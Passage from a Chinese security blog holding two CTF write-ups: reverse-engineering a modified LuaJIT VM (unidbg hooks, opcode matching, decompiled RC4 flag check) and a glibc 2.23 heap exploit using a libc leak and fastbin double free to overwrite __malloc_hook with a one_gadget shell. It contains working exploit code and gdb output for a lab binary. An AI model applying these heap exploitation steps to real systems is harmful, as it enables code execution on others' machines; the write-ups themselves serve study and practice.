  uint8_t align2[(16-sizeof(jit_State)-sizeof(HotCount)*HOTCOUNT_SIZE)&15];
#endif
#endif
  ASMFunction dispatch[GG_LEN_DISP];/* Instruction dispatch tables. */
  BCIns bcff[GG_NUM_ASMFF];/* Bytecode for ASM fast functions. */
} GG_State;

INS 是 opcode 的值；GG_G2DISP 是 Global state 与 dispatch表之间的偏移。

#define GG_G2DISP(GG_OFS(dispatch) - GG_OFS(g))

所以这三条指令的意思就是 jmp dispatch[opcode] ，所以只需要拿到 GL 和 GG_G2DISP 即可算出dispatch表的地址，找到每条指令的实现地址。这里我使用 unidbg 获取

emulator.getBackend().hook_add_new(new CodeHook() {
    @Override
    public void hook(com.github.unidbg.arm.backend.Backend backend, long address, int size, Object user) {
        long dispatchTableAddr = backend.reg_read(Arm64Const.UC_ARM64_REG_X22).longValue() + 0xF98; // f98 是 GG_G2DISP 
        for (int i = 0; i < 97; i++) {
            long dispatchAddr = ByteBuffer.wrap(backend.mem_read(dispatchTableAddr + i * 8, 8)).order(ByteOrder.LITTLE_ENDIAN).getLong();
            dispatchAddr -= dm.getModule().base;
            System.out.println("dispatchAddr " + i + " => 0x" + Long.toHexString(dispatchAddr));
        }
    }
    @Override
    public void onAttach(UnHook unHook) {}
    @Override
    public void detach() {}
}, dm.getModule().base + 0x258CC, dm.getModule().base + 0x258CD, null);

找到之后给每个分支改个名：

from idaapi import *

# rename functions
dispatch_table = [0x234b0, 0x234e8, 0x2350c, 0x23544, 0x235bc, 0x23628, 0x23670, 0x236f4, 0x23774, 0x237c4, 0x23830,
                  0x2385c, 0x23888, 0x238cc, 0x2390c, 0x2394c, 0x239fc, 0x23af8, 0x23b40, 0x23bc0, 0x23c38, 0x23c80,
                  0x23ccc, 0x23d5c, 0x23dac, 0x23e38, 0x23e5c, 0x23e7c, 0x23eac, 0x23f18, 0x23f8c, 0x24000, 0x24044,
                  0x2408c, 0x240f8, 0x24164, 0x241d0, 0x24244, 0x2428c, 0x24304, 0x24370, 0x243b8, 0x243dc, 0x243fc,
                  0x24490, 0x244f8, 0x2452c, 0x24560, 0x24580, 0x245b0, 0x245e4, 0x24654, 0x24668, 0x24720, 0x247a0,
                  0x24820, 0x248a0, 0x2492c, 0x24970, 0x249c0, 0x24a54, 0x24a90, 0x24ad8, 0x24b38, 0x24b44, 0x24b54,
                  0x24bbc, 0x24c24, 0x24c84, 0x24d28, 0x24d7c, 0x24d94, 0x24dac, 0x24e38, 0x24ef4, 0x24f94, 0x2503c,
                  0x250ac, 0x2513c, 0x251f4, 0x251f4, 0x25280, 0x25320, 0x25320, 0x25354, 0x253a0, 0x253a0, 0x253b8,
                  0x253d8, 0x25414, 0x25414, 0x25454, 0x25484, 0x25484, 0x2550c, 0x25510, 0x25558]

for i in range(len(dispatch_table)):
    set_name(dispatch_table[i], f'op_{i:02x}')

3.3 分支识别

因为 LuaJIT 的虚拟机实现是使用汇编写的，每个分支指令非常固定，一般来说大部分指令不会随着编译器版本、混淆等外界因素发生变化。因此只要提取每个分支处理逻辑的的指令序列形成指令的特征进行特征识别即可识别大部分指令。

首先，是在 Android 上编译一个 LuaJIT 这个很简单官方提供了详细的说明不再赘述，此外 LuaJIT 还提供了一个 lj_bc_ofs 其中记录了每个指令距离第一个指令处理逻辑（lj_vm_asm_begin）的偏移，可以根据这个结构大概的不准确的计算出每个指令所包含的指令。

基于此，可以先根据编译出的标准版提取出每个指令的特征，我这里简单的实现了一个提取特征的函数基本可以匹配大部分，有几个识别不到的要手动一下。

def get_feature(addr, size):
    ret = ''
    if size <= 0:
        return ret
    for inst in cs.disasm(get_bytes(addr, size), 0):
        inst: CsInsn
        if CS_GRP_JUMP in inst.groups or CS_GRP_CALL in inst.groups: # 位置相关指令操作数不作为特征
            instr_feature = inst.mnemonic
        else:
            instr_feature = inst.mnemonic + inst.op_str
        if inst.mnemonic == 'ldr': # ldr指令立即数操作数不作为特征 （不同版本的虚拟机变化一般不大，但是c语言结构体的各种偏移会有影响）
            ret += re.sub(r'#(0x)?[0-9a-f]+', '#0', instr_feature)
        else:
            ret += instr_feature
    return ret

提取特征：

lj_bc_ofs = [0x0000, 0x0080, 0x0100, 0x0180, 0x0200, 0x0284, 0x0304, 0x0354, 0x03A4, 0x0430, 0x04BC, 0x0500, 0x0544, 0x0584,
             0x05C4, 0x05FC, 0x0634, 0x0658, 0x067C, 0x069C, 0x06CC, 0x0710, 0x0758, 0x07C4, 0x0830, 0x08A4, 0x08EC, 0x0964,
             0x09D0, 0x0A3C, 0x0AB0, 0x0AF8, 0x0B70, 0x0BDC, 0x0C48, 0x0CBC, 0x0D04, 0x0D7C, 0x0DC4, 0x0E10, 0x0E3C, 0x0E68,
             0x0E8C, 0x0EAC, 0x0ECC, 0x0EFC, 0x0F30, 0x0FA0, 0x1008, 0x103C, 0x1070, 0x10AC, 0x10F4, 0x1154, 0x11A8, 0x11C0,
             0x11D8, 0x1264, 0x12F8, 0x1364, 0x13AC, 0x145C, 0x1558, 0x15E8, 0x167C, 0x16E4, 0x16F4, 0x1738, 0x1744, 0x17FC,
             0x184C, 0x190C, 0x19C8, 0x1A68, 0x1A7C, 0x1B24, 0x1B8C, 0x1BFC, 0x1C8C, 0x1D28, 0x1D44, 0x1DD0, 0x1E54, 0x1E70,
             0x1EA4, 0x1ED4, 0x1EF0, 0x1F08, 0x1F28, 0x1F48, 0x1F64, 0x1FA4, 0x1FD4, 0x1FD4, 0x205C, 0x2060, 0x20A8, 0x287C]
lj_vm_asm_begin = 0x1DEE0

feature_dic = dict()
for i in range(97):
    feature = get_feature(lj_vm_asm_begin + lj_bc_ofs[i], lj_bc_ofs[i + 1] - lj_bc_ofs[i])
    feature_dic[feature] = i
print(feature_dic)

匹配特征：

lj_bc_ofs = [0x0000, 0x0038, 0x005C, 0x0094, 0x010C, 0x0178, 0x01C0, 0x0244, 0x02C4, 0x0314, 0x0380, 0x03AC, 0x03D8, 0x041C,
             0x045C, 0x049C, 0x054C, 0x0648, 0x0690, 0x0710, 0x0788, 0x07D0, 0x081C, 0x08AC, 0x08FC, 0x0988, 0x09AC, 0x09CC,
             0x09FC, 0x0A68, 0x0ADC, 0x0B50, 0x0B94, 0x0BDC, 0x0C48, 0x0CB4, 0x0D20, 0x0D94, 0x0DDC, 0x0E54, 0x0EC0, 0x0F08,
             0x0F2C, 0x0F4C, 0x0FE0, 0x1048, 0x107C, 0x10B0, 0x10D0, 0x1100, 0x1134, 0x11A4, 0x11B8, 0x1270, 0x12F0, 0x1370,
             0x13F0, 0x147C, 0x14C0, 0x1510, 0x15A4, 0x15E0, 0x1628, 0x1688, 0x1694, 0x16A4, 0x170C, 0x1774, 0x17B8, 0x1878,
             0x18CC, 0x18E4, 0x18FC, 0x1988, 0x1A44, 0x1AE4, 0x1B8C, 0x1BFC, 0x1C8C, 0x1D28, 0x1D44, 0x1DD0, 0x1E54, 0x1E70,
             0x1EA4, 0x1ED4, 0x1EF0, 0x1F08, 0x1F28, 0x1F48, 0x1F64, 0x1FA4, 0x1FD4, 0x1FD4, 0x205C, 0x2060, 0x20A8, 0x287C]
lj_vm_asm_begin = 0x234b0

feature_dic = {}
for i in range(97):
    feature = get_feature(lj_vm_asm_begin + lj_bc_ofs[i], lj_bc_ofs[i + 1] - lj_bc_ofs[i])
    if feature in feature_dic:
        print(f'{i} => {feature_dic[feature]}')
    else:
        print(f'{i} => "not found"')

结合手动分析了几个分支的出最后的 opcode 顺序（大部分基于自动化识别，不保证正确性）：

(0x00, instructions.ISF),
(0x01, instructions.ISTYPE),
(0x02, instructions.IST),
(0x03, instructions.MODNV),
(0x04, instructions.ADDVV),
(0x05, instructions.TGETR),
(0x06, instructions.ISEQV),
(0x07, instructions.ISNEV),
(0x08, instructions.ISEQS),
(0x09, instructions.TGETB),
(0x0a, instructions.KSTR),
(0x0b, instructions.KCDATA),
(0x0c, instructions.ISNEP),
(0x0d, instructions.ISTC),
(0x0e, instructions.ISFC),
(0x0f, instructions.TSETV),
(0x10, instructions.TSETS),
(0x11, instructions.DIVNV),
(0x12, instructions.ISLT),
(0x13, instructions.MODVV),
(0x14, instructions.POW),
(0x15, instructions.CAT),
(0x16, instructions.TSETB),
(0x17, instructions.ISNES),
(0x18, instructions.ISEQN),
(0x19, instructions.ISNUM),
(0x1a, instructions.MOV),
(0x1b, instructions.NOT),
(0x1c, instructions.SUBVV),
(0x1d, instructions.MULVV),
(0x1e, instructions.MULVN),
(0x1f, instructions.UNM),
(0x20, instructions.LEN),
(0x21, instructions.ADDVN),
(0x22, instructions.SUBVN),
(0x23, instructions.SUBNV),
(0x24, instructions.MULNV),
(0x25, instructions.DIVVN),
(0x26, instructions.MODVN),
(0x27, instructions.ADDNV),
(0x28, instructions.DIVVV),
(0x29, instructions.KSHORT),
(0x2a, instructions.KNUM),
(0x2b, instructions.TSETM),
(0x2c, instructions.USETS),
(0x2d, instructions.USETN),
(0x2e, instructions.USETP),
(0x2f, instructions.KPRI),
(0x30, instructions.KNIL),
(0x31, instructions.UGET),
(0x32, instructions.USETV),
(0x33, instructions.RETM),
(0x34, instructions.CALLT),
(0x35, instructions.ISLE),
(0x36, instructions.ISGT),
(0x37, instructions.ISGE),
(0x38, instructions.ISNEN),
(0x39, instructions.ISEQP),
(0x3a, instructions.ITERC),
(0x3b, instructions.TGETS),
(0x3c, instructions.UCLO),
(0x3d, instructions.FNEW),
(0x3e, instructions.TNEW),
(0x3f, instructions.CALLMT),
(0x40, instructions.CALLM),
(0x41, instructions.RET0),
(0x42, instructions.TSETR),
(0x43, instructions.CALL),
(0x44, instructions.ITERN),
(0x45, instructions.TDUP),
(0x46, instructions.GGET),
(0x47, instructions.GSET),
(0x48, instructions.TGETV),
(0x49, instructions.VARG),
(0x4a, instructions.ISNEXT),
(0x4b, instructions.RET),
(0x4c, instructions.RET1),
(0x4d, instructions.FORI),
(0x4e, instructions.JFORI),
(0x4f, instructions.FORL),
(0x50, instructions.IFORL),
(0x51, instructions.JFORL),
(0x52, instructions.ITERL),
(0x53, instructions.IITERL),
(0x54, instructions.JITERL),
(0x55, instructions.LOOP),
(0x56, instructions.ILOOP),
(0x57, instructions.JLOOP),
(0x58, instructions.JMP),
(0x59, instructions.FUNCF),
(0x5a, instructions.IFUNCF),
(0x5b, instructions.JFUNCF),
(0x5c, instructions.FUNCV),
(0x5d, instructions.IFUNCV),
(0x5e, instructions.JFUNCV),
(0x5f, instructions.FUNCC),
(0x60, instructions.FUNCCW)

对于 LuaJIT 的反编译~~一般使用 luajit-decompiler 这个项目，~~但是这个项目中对于 opcode 的分类全是基于标准 opcode 直接的数值关系做的，所以修起来很难受，总之就是把所有的大于小于判断替换成对应的 in (x, y, z….) 最终反编译的结果是这样的，感觉哪里错了，也解不出来 flag，我也懒得分析了，大概就是这样。

jit.off()

slot0 = require("bit")

function BBB(slot0)
slot1 = {}
slot2 = #slot0

for slot6 = 1, #slot0 do
table.insert(slot1, string.format("%02x", uv0.bxor(218, string.byte(slot0, slot6))))
end

return table.concat(slot1)
end

function CCC(slot0, slot1)
slot2 = {}

for slot6 = 1, #slot0, 2 do
table.insert(slot2, string.char(uv0.bxor(tonumber(slot0:sub(slot6, slot6 + 2 - 1), 16), slot1 or 218)))
end

return table.concat(slot2)
end

function AAA(slot0, slot1)
slot2 = {
[slot6] = slot6 - 1
}

for slot6 = 1, 256 do
end

for slot7 = 1, 256 do
slot3 = (0 + slot2[slot7] + string.byte(slot0, slot7 % #slot0 + 1)) % 256
t = slot2[slot7]
slot2[slot7] = slot2[slot3 + 1]
t = slot2[slot3 + 1]
end

slot11 = "."

for slot11 in slot1:gmatch(slot11), nil,  do
slot4 = (1 + 1) % 256
slot5 = (0 + slot2[slot4 + 1]) % 256
t = slot2[slot4 + 1]
slot2[slot4 + 1] = slot2[slot5 + 1]
slot2[slot5 + 1] = t
slot14 = uv0.bxor(string.byte(slot11), slot2[(slot2[slot4 + 1] + slot2[slot5 + 1]) % 256 + 1])
slot7 = "" .. string.format("%02x", slot14)
slot6 = "" .. string.char(slot14)
end

return slot7
end

function DDD()
return "ca3f7e84a61b756c457eec122b9320feed15069ab19c84d9bf1d3f78178b0eaabf16a7fa8"
end

function checkflag(slot0)
if AAA(BBB("8d97998e9ce8eae8ee"), slot0) == DDD() then
return 1
end

return 0
end

后面得知，问题是 luajit-decompiler 项目导致的，使用luajit-decompiler-v2 即可

https://github.com/marsinator358/luajit-decompiler-v2

jit.off()

local var_0_0 = require("bit")

function BBB(arg_1_0)
local var_1_0 = {}
local var_1_1 = #arg_1_0

for iter_1_0 = 1, #arg_1_0 do
local var_1_2 = string.byte(arg_1_0, iter_1_0)
local var_1_3 = var_0_0.bxor(218, var_1_2)

table.insert(var_1_0, string.format("%02x", var_1_3))
end

return table.concat(var_1_0)
end

function CCC(arg_2_0, arg_2_1)
local var_2_0 = {}

arg_2_1 = arg_2_1 or 218

for iter_2_0 = 1, #arg_2_0, 2 do
local var_2_1 = arg_2_0:sub(iter_2_0, iter_2_0 + 2 - 1)
local var_2_2 = tonumber(var_2_1, 16)
local var_2_3 = var_0_0.bxor(var_2_2, arg_2_1)

table.insert(var_2_0, string.char(var_2_3))
end

return table.concat(var_2_0)
end

function AAA(arg_3_0, arg_3_1)
local var_3_0 = {}

for iter_3_0 = 1, 256 do
var_3_0[iter_3_0] = iter_3_0 - 1
end

local var_3_1 = 0

for iter_3_1 = 1, 256 do
var_3_1 = (var_3_1 + var_3_0[iter_3_1] + string.byte(arg_3_0, iter_3_1 % #arg_3_0 + 1)) % 256
var_3_0[iter_3_1], var_3_0[var_3_1 + 1] = var_3_0[var_3_1 + 1], var_3_0[iter_3_1]
end

local var_3_2 = 1
local var_3_3 = 0
local var_3_4 = ""
local var_3_5 = ""

for iter_3_2 in arg_3_1:gmatch(".") do
var_3_2 = (var_3_2 + 1) % 256
var_3_3 = (var_3_3 + var_3_0[var_3_2 + 1]) % 256
var_3_0[var_3_2 + 1], var_3_0[var_3_3 + 1] = var_3_0[var_3_3 + 1], var_3_0[var_3_2 + 1]

local var_3_6 = var_3_0[(var_3_0[var_3_2 + 1] + var_3_0[var_3_3 + 1]) % 256 + 1]
local var_3_7 = var_0_0.bxor(string.byte(iter_3_2), var_3_6)
local var_3_8 = string.format("%02x", var_3_7)

var_3_5 = var_3_5 .. var_3_8
var_3_4 = var_3_4 .. string.char(var_3_7)
end

return var_3_5
end

function DDD()
return "ca3f7e84a61b756c457eec122b9320feed15069ab19c84d9bf1d3f78178b0eaabf16a7fa8"
end

function checkflag(arg_5_0)
local var_5_0 = BBB("8d97998e9ce8eae8ee")

if AAA(var_5_0, arg_5_0) == DDD() then
return 1
end

return 0
end

return

3.4 求解

虽然解不出来，但是流密码直接 hook bxor 实现把密钥流拿一下就行，bit 库的实现在lib_bit.c 这个文件，里面没有 bit_bxor 的实现，实现就在汇编里。

LJLIB_ASM_(bit_bor)LJLIB_REC(bit_nary IR_BOR)
LJLIB_ASM_(bit_bxor)LJLIB_REC(bit_nary IR_BXOR)

直接搜一下指令序列找到之后 hook 即可。

emulator.getBackend().hook_add_new(new CodeHook() {
    @Override
    public void hook(Backend backend, long address, int size, Object user) {
        long RA = backend.reg_read(Arm64Const.UC_ARM64_REG_W0).longValue() & 0xffffffffL;
        long RB = backend.reg_read(Arm64Const.UC_ARM64_REG_W8).longValue() & 0xffffffffL;
        System.out.println("\tRA=" + Long.toHexString(RA) + ", RB=" + Long.toHexString(RB));
    }
    @Override
    public void onAttach(UnHook unHook) {}
    @Override
    public void detach() {}
}, dm.getModule().base + 0x26AFC, dm.getModule().base + 0x26AFC, null);

4. 后记

对于 Lua 的指令opcode的识别，相对来说更加复杂。但是如果没有混淆在解释器中的话，可以通过 DIE 等工具尽可能的识别编译器的确切版本、编译参数等外界因素来进行类似的识别，柏鹭杯中的那个题我就曾使用这种方法成功实现识别，但是当时未能及时记录，时间过了好久也懒得重新写了。

除了这些，我博客中对于 2023 年巅峰极客 ezlua 的复现过程，也是学习 LuaJIT 的较好的资料。

https://www.cnblogs.com/gaoyucan/p/17577858.html

2023安徽省赛free复现

s1nk — Sun, 15 Oct 2023 16:00:00 GMT

当时这个题目是 0 解了的。这是我第一次做堆相关的题目，当时比赛的时候不给网络，也没有事先准备什么材料，所以比赛的时候一点思路也没有。比赛结束之后参考了一下网上的一些资料问了一下 Lotus ✌ 也算是复现出来了。

`libc` 版本问题解决

题目给的 libc 版本为 libc-2.23.so，调试发现直接运行根本不会使用这个版本的 libc ，知道可以 patch 解决，但是感觉胖爷应该有更好的方法，遂去问 Lotus ✌

废物小高：咋让程序用他附件里给的 libc 版本啊
废物小高：[不知所措.gif]
Lotus ✌ : patchelf

还是 patch 一下吧，从网上找了一篇相关的文章，跟着做了一下

主要就是下面两句

patchelf --set-interpreter /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so ./double_free

patchelf --replace-needed libc.so.6 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so ./double_free

再运行，发现已经用上 libc-2.23.so 了，解决。

pwndbg> libs
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
             Start                End Perm     Size Offset File
    0x555555400000     0x555555401000 r-xp     1000      0 /home/s1nk/CTF/pwn/free/double_free
    0x555555601000     0x555555602000 r--p     1000   1000 /home/s1nk/CTF/pwn/free/double_free
    0x555555602000     0x555555603000 rw-p     1000   2000 /home/s1nk/CTF/pwn/free/double_free
    0x555555603000     0x555555609000 rw-p     6000   4000 /home/s1nk/CTF/pwn/free/double_free
    0x7ffff7a0d000     0x7ffff7bcd000 r-xp   1c0000      0 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
    0x7ffff7bcd000     0x7ffff7dcd000 ---p   200000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
    0x7ffff7dcd000     0x7ffff7dd1000 r--p     4000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
    0x7ffff7dd1000     0x7ffff7dd3000 rw-p     2000 1c4000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
    0x7ffff7dd3000     0x7ffff7dd7000 rw-p     4000      0 [anon_7ffff7dd3]
    0x7ffff7dd7000     0x7ffff7dfd000 r-xp    26000      0 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so
    0x7ffff7ff3000     0x7ffff7ff6000 rw-p     3000      0 [anon_7ffff7ff3]
    0x7ffff7ff6000     0x7ffff7ffa000 r--p     4000      0 [vvar]
    0x7ffff7ffa000     0x7ffff7ffc000 r-xp     2000      0 [vdso]
    0x7ffff7ffc000     0x7ffff7ffd000 r--p     1000  25000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so
    0x7ffff7ffd000     0x7ffff7ffe000 rw-p     1000  26000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so
    0x7ffff7ffe000     0x7ffff7fff000 rw-p     1000      0 [anon_7ffff7ffe]
    0x7ffffffde000     0x7ffffffff000 rw-p    21000      0 [stack]

本部分主要参考：

1. 利用 patchelf 修改 pwn 题目的 libc

利用

题目的名字是 free ，附件的名字是 double_free，不难让人想到题目利用的主要漏洞是 double free。从网上找了一些相关的材料，结合自己逆向分析的结果，最初确定思路大概就是

利用unsorted bin 的特性泄露 libc 基地址
利用 double free 实现 UAF 然后控制 fd 指针到 __malloc_hook 最终实现修改 __malloc_hook 为 one_gadget

利用 unsorted bin 的特性泄露 `libc`基地址

unsorted bin 在管理时为循环双向链表，在该链表中必有一个节点（不准确的说，是尾节点，这个就意会一下把，毕竟循环链表实际上没有头尾）的 fd 指针会指向 main_arena 结构体内部。

可以通过 UAF 泄露 fd 指针，拿到一个与 main_arena 有固定偏移的地址，而main_arena 是 libc中的一个全局变量，它相对于libc基地址的偏移量是固定的可以通过调试得到，以获取libc基地址。

pwndbg> bins
fastbins
empty
unsortedbin
all: 0x555555609000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x555555609000
smallbins
empty
largebins
empty
pwndbg> vmmap libc-2.23.so
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
             Start                End Perm     Size Offset File
    0x555555609000     0x55555562a000 rw-p    21000      0 [heap]
►   0x7ffff7a0d000     0x7ffff7bcd000 r-xp   1c0000      0 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
►   0x7ffff7bcd000     0x7ffff7dcd000 ---p   200000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
►   0x7ffff7bcd000     0x7ffff7dcd000 ---p   200000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
►   0x7ffff7dcd000     0x7ffff7dd1000 r--p     4000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
►   0x7ffff7dcd000     0x7ffff7dd1000 r--p     4000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
►   0x7ffff7dd1000     0x7ffff7dd3000 rw-p     2000 1c4000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
►   0x7ffff7dd1000     0x7ffff7dd3000 rw-p     2000 1c4000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
    0x7ffff7dd3000     0x7ffff7dd7000 rw-p     4000      0 [anon_7ffff7dd3]

所以，偏移量 offset = 0x7ffff7dd1b78 - 0x7ffff7a0d000 = 3951480

泄露过程如下：

# leak libc base
alloc(0x100, b'1' * 0x100)
alloc(1, b'1')# 防止 unsorted 的那个chunk 和 top chunk 紧邻
delete(0)
show(0)

r = sh.recvline(keepends=False).ljust(8, b'\x00')
libc_addr = u64(r) - 3951480
print(hex(libc_addr))

完整代码见后文

double free

fastbin double free 是指 fastbin 的 chunk 可以被多次释放，因此可以在 fastbin 链表中存在多次,这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块，相当于多个指针指向同一个堆块。

所以，当我们执行如下操作后，chunk#2 就会在 fastbin 中出现两次

# double free
alloc(0x60, b'1')# 2
alloc(0x60, b'1')# 3

delete(2)
delete(3)
delete(2)

pwndbg> fastbins
fastbins
0x70: 0x5565b2328000 —▸ 0x5565b2328070 ◂— 0x5565b2328000

也就是上面的 0x5565b2328000，此时我们就可以通过 alloc(0x60, p64(evil_chunk)) # 4，设置 0x5565b2328000 地址这个 chunk 的 fd 为指定地址。

比如下图中，就是设置成了 0x7f9f2e9bbaed

pwndbg> fastbins
fastbins
0x70: 0x5565b2328070 —▸ 0x5565b2328000 —▸ 0x7f9f2e9bbaed (_IO_wide_data_0+301) ◂— 0x9f2e67cea0000000

只要控制 fd 的值指向 __malloc_hook 地址的前面一点，就可以实现对 __malloc_hook 的控制

pwndbg> x/10gx &__malloc_hook
0x7f9f2e9bbb10 <__malloc_hook>: 0x0000000000000000      0x0000000000000000
0x7f9f2e9bbb20 :    0x0000000000000000      0x0000000000000000
0x7f9f2e9bbb30 : 0x0000000000000000      0x0000000000000000
0x7f9f2e9bbb40 : 0x0000000000000000      0x0000000000000000
0x7f9f2e9bbb50 : 0x00005565b2328070      0x0000000000000000
pwndbg> x/10gx ((long long)&__malloc_hook - 0x30)
0x7f9f2e9bbae0 <_IO_wide_data_0+288>:   0x0000000000000000      0x0000000000000000
0x7f9f2e9bbaf0 <_IO_wide_data_0+304>:   0x00007f9f2e9ba260      0x0000000000000000
0x7f9f2e9bbb00 <__memalign_hook>:       0x00007f9f2e67cea0      0x00007f9f2e67ca70
0x7f9f2e9bbb10 <__malloc_hook>: 0x0000000000000000      0x0000000000000000
0x7f9f2e9bbb20 :    0x0000000000000000      0x0000000000000000
pwndbg> x/64bx ((long long)&__malloc_hook - 0x30)
0x7f9f2e9bbae0 <_IO_wide_data_0+288>:   0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7f9f2e9bbae8 <_IO_wide_data_0+296>:   0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7f9f2e9bbaf0 <_IO_wide_data_0+304>:   0x60    0xa2    0x9b    0x2e    0x9f    0x7f    0x00    0x00
0x7f9f2e9bbaf8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7f9f2e9bbb00 <__memalign_hook>:       0xa0    0xce    0x67    0x2e    0x9f    0x7f    0x00    0x00
0x7f9f2e9bbb08 <__realloc_hook>:        0x70    0xca    0x67    0x2e    0x9f    0x7f    0x00    0x00
0x7f9f2e9bbb10 <__malloc_hook>: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7f9f2e9bbb18: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

为了满足chunk 的 size 字段，这里需要取 &__malloc_hook - 0x23

pwndbg> x/10gx ((long long)&__malloc_hook - 0x23)
0x7f9f2e9bbaed <_IO_wide_data_0+301>:   0x9f2e9ba260000000      `0x000000000000007f`
0x7f9f2e9bbafd: 0x9f2e67cea0000000      0x9f2e67ca7000007f
0x7f9f2e9bbb0d <__realloc_hook+5>:      0x000000000000007f      0x0000000000000000
0x7f9f2e9bbb1d: 0x0000000000000000      0x0000000000000000
0x7f9f2e9bbb2d : 0x0000000000000000      0x0000000000000000

此时，size 字段为 0x7f 刚好可以过这个检查

// 检查取到的 chunk 大小是否与相应的 fastbin 索引一致。// 根据取得的 victim ，利用 chunksize 计算其大小。// 利用fastbin_index 计算 chunk 的索引。if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0)) {
    errstr = "malloc(): memory corruption (fast)";

使用工具查找 libc 中的 one_gadget

➜  free one_gadget libc-2.23.so
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

所以利用方法为

# leak libc base
alloc(0x100, b'1' * 0x100)
alloc(1, b'1')# 防止 unsorted 的那个chunk 和 top chunk 紧邻
delete(0)
show(0)

r = sh.recvline(keepends=False).ljust(8, b'\x00')
libc_addr = u64(r) - 3951480
# print(hex(libc_addr))

__malloc_hook = libc.symbols['__malloc_hook'] + libc_addr
ogg = 0x4527a + libc_addr

evil_chunk = __malloc_hook - 0x23

# double free
alloc(0x60, b'1')# 2
alloc(0x60, b'1')# 3

delete(2)
delete(3)
delete(2)

alloc(0x60, p64(evil_chunk))# 4
alloc(0x60, b'1')# 5
alloc(0x60, p64(evil_chunk))# 6
alloc(0x60, b'a' * 0x10 + b'a' * 0x3 + p64(ogg))# 6

此时，__malloc_hook指向 one_gadget，如果顺利的话，下次 malloc 就会触发 one_gadget 进而实现 get_shell。但是事与愿违，试了所有的 one_gadget 发现都不符合条件，害。

本部分主要参考：

1. pwn学习系列之double free

2. Unsorted Bin Attack - CTF Wiki

3. glibc里的one gadget

4. Fastbin Attack - CTF Wiki

利用 realloc 调整栈使one_gadget生效

一番搜索无果后，继续选择问 Lotus ✌，

废物小高：找到的one_gadget 都不行，这种情况咋搞
废物小高：[不知所措.gif]
Lotus ✌ : 用 realloc_hook 调一下，https://blog.csdn.net/Invin_cible/article/details/123042819?spm=1001.2014.3001.5501

文章看了一下，个人理解就是把 __malloc_hook 的值设置为 realloc + ofsset ，然后 malloc 的时候就会触发 realloc，并利用 offset 对 rsp 的值进行调整，再把 __realloc_hook的值设置为 one_gadget ，这样在 realloc 触发后就会继续触发 one_gadget。通过前面的查看可以得知，__realloc_hook 就在 __malloc_hook 前面紧挨着。看一下 realloc 函数的内容，发现和 Lotus ✌ 博客里的一样

pwndbg> x/20i 140391966390032
   0x7faf8d493710 <__GI___libc_realloc>:        push   r15
   0x7faf8d493712 <__GI___libc_realloc+2>:      push   r14
   0x7faf8d493714 <__GI___libc_realloc+4>:      push   r13
   0x7faf8d493716 <__GI___libc_realloc+6>:      push   r12
   0x7faf8d493718 <__GI___libc_realloc+8>:      mov    r12,rsi
   0x7faf8d49371b <__GI___libc_realloc+11>:     push   rbp
   0x7faf8d49371c <__GI___libc_realloc+12>:     push   rbx
   0x7faf8d49371d <__GI___libc_realloc+13>:     mov    rbx,rdi
   0x7faf8d493720 <__GI___libc_realloc+16>:     sub    rsp,0x38
   0x7faf8d493724 <__GI___libc_realloc+20>:     mov    rax,QWORD PTR [rip+0x33f8a5]# 0x7faf8d7d2fd0
   0x7faf8d49372b <__GI___libc_realloc+27>:     mov    rax,QWORD PTR [rax]
   0x7faf8d49372e <__GI___libc_realloc+30>:     test   rax,rax
   0x7faf8d493731 <__GI___libc_realloc+33>:     jne    0x7faf8d493958 <__GI___libc_realloc+584>
   0x7faf8d493737 <__GI___libc_realloc+39>:     test   rsi,rsi
   0x7faf8d49373a <__GI___libc_realloc+42>:     sete   dl
   0x7faf8d49373d <__GI___libc_realloc+45>:     test   rdi,rdi
   0x7faf8d493740 <__GI___libc_realloc+48>:     setne  al
   0x7faf8d493743 <__GI___libc_realloc+51>:     and    al,dl
